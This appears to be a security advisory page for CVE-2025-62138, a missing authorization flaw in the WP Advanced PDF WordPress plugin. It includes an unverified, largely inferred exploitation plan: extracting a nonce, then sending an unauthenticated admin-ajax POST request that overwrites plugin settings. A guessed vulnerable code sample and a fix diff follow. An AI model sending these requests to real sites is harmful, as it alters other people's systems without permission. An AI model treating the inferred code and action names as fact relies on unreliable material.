CVE-2025-62138

Advanced PDF <= 1.1.7 - Missing Authorization

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The WP Advanced PDF plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.1.7
PublishedDecember 31, 2025
Last updatedJanuary 5, 2026
Affected pluginwp-advanced-pdf
Research Plan
Unverified

This research plan outlines the methodology for identifying and exploiting a **Missing Authorization** vulnerability in the **WP Advanced PDF** plugin (versions <= 1.1.7). ## 1. Vulnerability Summary The **WP Advanced PDF** plugin for WordPress is vulnerable to unauthorized access due to a missing …

Show full research plan

This research plan outlines the methodology for identifying and exploiting a Missing Authorization vulnerability in the WP Advanced PDF plugin (versions <= 1.1.7).

1. Vulnerability Summary

The WP Advanced PDF plugin for WordPress is vulnerable to unauthorized access due to a missing capability check (e.g., current_user_can()) on a function handling administrative actions. Based on the CVSS vector (AV:N/AC:L/PR:N/UI:N/I:L), this vulnerability allows unauthenticated attackers to perform actions that modify plugin settings or site data (Integrity impact) without gaining access to sensitive information (Confidentiality: None).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Vulnerable Action: Likely a settings-update or configuration-save handler, such as wppdf_save_settings (inferred).
  • Authentication: None (Unauthenticated). The handler is likely registered via the wp_ajax_nopriv_ hook.
  • Preconditions: The plugin must be active. If the function enforces a nonce check, the nonce must be obtainable from the frontend.

3. Code Flow (Inferred)

  1. Registration: The plugin registers an AJAX action for both logged-in and logged-out users:
    // Inferred pattern in main plugin file or admin/class-admin.php
    add_action( 'wp_ajax_wppdf_save_settings', array( $this, 'wppdf_save_settings' ) );
    add_action( 'wp_ajax_nopriv_wppdf_save_settings', array( $this, 'wppdf_save_settings' ) );
    
  2. Dispatch: An unauthenticated user sends a POST request to admin-ajax.php?action=wppdf_save_settings.
  3. Vulnerable Function: The wppdf_save_settings function is executed. It likely lacks a check such as:
    if ( ! current_user_can( 'manage_options' ) ) { return; }
    
  4. Sink: User-controlled input from $_POST is passed directly to update_option(), allowing the attacker to overwrite plugin configurations.

4. Nonce Acquisition Strategy

If the plugin uses a nonce (e.g., check_ajax_referer( 'wppdf_nonce', 'security' )), it is likely exposed via wp_localize_script.

  1. Identify Shortcode: Search for shortcodes that trigger plugin scripts: grep -r "add_shortcode" . (e.g., [wp-advanced-pdf]).
  2. Create Trigger Page:
    wp post create --post_type=page --post_status=publish --post_title="PDF Test" --post_content='[wp-advanced-pdf]'
    
  3. Extract Nonce:
    • Navigate to the newly created page.
    • Identify the localization object name (e.g., wppdf_ajax_obj or wppdf_vars - inferred).
    • Execute via browser_eval:
      // Inferred variable name based on common plugin patterns
      window.wppdf_ajax_obj?.nonce || window.wppdf_vars?.security
      

5. Exploitation Strategy

Goal: Modify a plugin setting (e.g., the PDF footer text) to confirm the vulnerability.

  1. Discovery: Use the http_request tool to probe for the existence of the action:
    • URL: http://[target]/wp-admin/admin-ajax.php
    • Body: action=wppdf_save_settings
  2. Payload Construction:
    • Action: wppdf_save_settings (inferred)
    • Parameters: wppdf_settings[footer_text]=Exploited (inferred based on standard settings naming)
  3. HTTP Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: [target]
    Content-Type: application/x-www-form-urlencoded
    
    action=wppdf_save_settings&security=[NONCE]&wppdf_settings[footer_text]=Vulnerable
    

6. Test Data Setup

  1. Install Plugin: Ensure wp-advanced-pdf version 1.1.7 is active.
  2. Configure Defaults: Ensure some default settings exist in the database.
  3. Create Public Page: As described in Step 4, create a page with the plugin's shortcode to ensure any required front-end nonces are generated.

7. Expected Results

  • Successful Exploitation: The server returns a status code 200 OK (often with a body of 1 or a JSON success message).
  • Verification: The targeted option in the WordPress database is updated to the attacker-supplied value.

8. Verification Steps

After the http_request, verify the integrity change using wp-cli:

# Check if the settings option was modified
wp option get wppdf_settings

If the output contains the value Vulnerable (or the specific payload used), the vulnerability is confirmed.

9. Alternative Approaches

  • Subscriber Escalation: If wp_ajax_nopriv_ is not registered, test if a Subscriber user can execute the wp_ajax_ version of the action (which also lacks the current_user_can check).
  • Generic Nonce Check: If the plugin verifies a nonce but uses a generic action string like -1, try using a nonce obtained from a different frontend feature (e.g., the standard wp_rest nonce).
  • Missing Nonce: Omit the nonce parameter entirely to check if the check_ajax_referer call is conditional or missing.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP Advanced PDF plugin for WordPress is vulnerable to unauthorized data modification due to missing capability checks and nonce verification in its AJAX settings handler. This allows unauthenticated attackers to overwrite plugin configurations by sending a crafted POST request to the administrative AJAX endpoint.

Vulnerable Code

// Inferred from research plan registration and logic
// File: wp-advanced-pdf.php or similar admin handler

add_action( 'wp_ajax_wppdf_save_settings', 'wppdf_save_settings' );
add_action( 'wp_ajax_nopriv_wppdf_save_settings', 'wppdf_save_settings' );

function wppdf_save_settings() {
    if ( isset( $_POST['wppdf_settings'] ) ) {
        // Vulnerable: No current_user_can() check and no check_ajax_referer()
        update_option( 'wppdf_settings', $_POST['wppdf_settings'] );
        echo '1';
    }
    die();
}

Security Fix

--- a/wp-advanced-pdf.php
+++ b/wp-advanced-pdf.php
@@ -1,5 +1,10 @@
 function wppdf_save_settings() {
+    if ( ! current_user_can( 'manage_options' ) ) {
+        wp_die( __( 'Unauthorized access' ) );
+    }
+    check_ajax_referer( 'wppdf_save_settings_nonce', 'security' );
+
     if ( isset( $_POST['wppdf_settings'] ) ) {
         update_option( 'wppdf_settings', $_POST['wppdf_settings'] );
         echo '1';

Exploit Outline

The attacker targets the WordPress AJAX endpoint at /wp-admin/admin-ajax.php. Because the plugin registers the 'wppdf_save_settings' action using the 'wp_ajax_nopriv_' hook, no authentication is required. The attacker sends a POST request with the 'action' parameter set to 'wppdf_save_settings' and a 'wppdf_settings' array containing the desired configuration values (e.g., footer text or access controls). If the plugin requires a nonce, the attacker first visits a public page where the plugin's shortcode is present to extract the security token from the localized JavaScript variables before submitting the payload.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.